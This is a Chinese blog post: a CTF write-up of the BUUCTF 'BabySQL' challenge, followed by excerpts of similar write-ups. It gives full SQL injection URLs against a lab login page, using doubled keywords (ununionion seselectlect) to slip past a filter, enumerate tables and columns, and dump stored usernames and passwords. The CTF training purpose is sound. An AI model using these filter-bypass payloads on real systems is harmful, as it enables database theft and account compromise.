BUUCTF [极客大挑战 2019]BabySQL 1

最新推荐文章于 2025-04-23 15:56:49 发布
原创 最新推荐文章于 2025-04-23 15:56:49 发布 · 534 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sqli

本文详细描述了一次针对登录系统的SQL注入挑战,通过多重绕过过滤,作者展示了如何逐步获取数据库名、表名、列名和敏感数据的过程,重点在于绕过技巧和过滤策略的应对

打开就是个登录框,这道题是注入,那无疑就是user或者password处了

输入数据,在这里插入图片描述

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11'&password=22

在这里插入图片描述

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' order by 10#&password=22

order by 判断列数发现order by 被过滤
在这里插入图片描述
直接union联合查询,发现union被过滤
在这里插入图片描述
双写绕过,

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,2,3%23&password=22

在这里插入图片描述
接下来就是常规操作:

查找数据库名 -> 表名   -> 列名 -> 数据
11' ununionion seselectlect 1,2,database()%23&password=22
11' ununionion seselectlect 1,(select group_concat(table_name) from information_shcema.tables where table_schema=database()),3%23&password=22
11' ununionion seselectlect 1,(select group_concat(column_name) from information_shcema.columns where table_name='表名'),3%23&password=22
11' ununionion seselectlect 1,(select group_concat(列名) from 表名 ),3%23&password=22

但是发现对or\where\select也做了过滤

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables where table_schema='geek'),database()%23&password=22

在这里插入图片描述
继续双写绕过

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'),database()%23&password=22

在这里插入图片描述

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'),database()%23&password=22

在这里插入图片描述

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(id,username,passwoorrd) frofromm b4bsql),database()%23&password=22

在这里插入图片描述

[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 549
BUUCTF的[极客挑战 2019]BabySQL 1
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 1139
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6725
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
BUUCTF——[极客挑战 2019]BabySQL 1
小白一枚多多关注的博客
03-16 1027
这道题打开后界面和前几道注入的题的界面是一样的,但难度也是呈直线的上升,我们先拿这道难的题来讲,等以后有时间了再将其他的题放出来 当我们看到这个界面的时候首先想到的应该是登陆的操作,但我们又不知道正确的用户名和密码,所以我们这里就采用管理员账号和万能密码试试 这里可以看见报错信息中没有出现or这个单词,所以我们猜想应该是用了过滤的手段将常见的sql注入的关键词给过滤掉了,为了验证这个想法我们再用联合查询试一试 果不其然,这里将union和select都过滤了(更不用说order by了),由此推理,我
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1386
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
[buuctf]/[极客挑战 2019]BabySQL 1
y14ffhgcg56_的博客
11-07 1873
这里出现报错,说不存在geek.Flag。根据上面我们知道存在geek这个库,和Flag这个表。但Flag这个表在ctf库下,并不在geek库下。所以可以将Flag改成ctf.Flag,表示查询数据库ctf下Flag表。下一步,进步确认闭合方式,正常步骤应该输入username=1' and 1=1 --q &password=1。(被过滤的词:and,or,by,union,select,from,where都可以用双写绕过)然后进行列数判断,又出现类似报错。接下来就是逐步的爆库,爆表,爆字段,爆内容。
BUUCTF [极客挑战 2019]BabySQL 1sql注入
weixin_45642610的博客
01-14 968
BUUCTF [极客挑战 2019]BabySQL 1 进去后是这样: 还是熟悉的配方,还是熟悉的味道。 题目就是sql注入,就不检测是否有注入点了。 输入1' or 1=1;# emmm…暂时看不懂什么意思 现在就可以胡乱的输入一些注入语句了。发现报错都是部分输入的语句,这说明没报错的语句没了,或者替换掉了,对,没错,可能是用replace函数换成空了。 现在证实这个猜想。在username输入1'%23就是1'#的意思: 用户名密码错误!说明我们的sql语句1'#是可执行的,也就是说之前的报错就
BUUCTF [web专项15][极客挑战 2019]BabySQL
yanglinchiji的博客
11-03 258
试一遍之后会发现or可能被过滤掉了,因为只有当or的形式变成非连接符的时候才可以通过。其实这题找出来万能钥匙成功登录后就没有想法了,看了一下别人的思路再做就ok了。进入后获得账号密码,用此账号密码进行登录,并在进行的同时进行注入操作。爆库,发现show databases不行,用麻烦点的。发现下面有个flag字段,选择爆数据。测试列数(密码需要自行修改)发现共有三列,开始测回显点。感觉在ctf中,再爆一下表。进入后发现是个登陆界面。查看表Flag下的字段。
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5530
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2181
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF[极客挑战 2019]BabySQL1
最新发布
shsisbdkka的博客
04-23 584
开始在可显示位置构造查询语句进行脱库(没有特殊说明数据库类型的话一般做题就当作mySQL或SQLserver的来看所以都是select....from information_schema....如果是Oracle的话是from dual,,all_tablees,,all_tab_columns)能登陆成功了,但是看不了可显示的字段是哪些,可能是被原本的正确登录页面覆盖了,所以我们。)后发现页面正常显示,开始增加数字小看字段数,发现加到4报错了,说明字段数是三。发现or被过滤,尝试小写或者。
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 343
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 1079
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
极客挑战2019babysql
03-28
### 极客挑战 2019 BabySQL 比赛题目与解题思路 #### 背景介绍 极客挑战 2019BabySQL 是一道经典的 SQL 注入题目,主要考察选手对于 SQL 注入漏洞的理解以及如何利用 `UNION` 查询绕过简单的过滤机制。该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值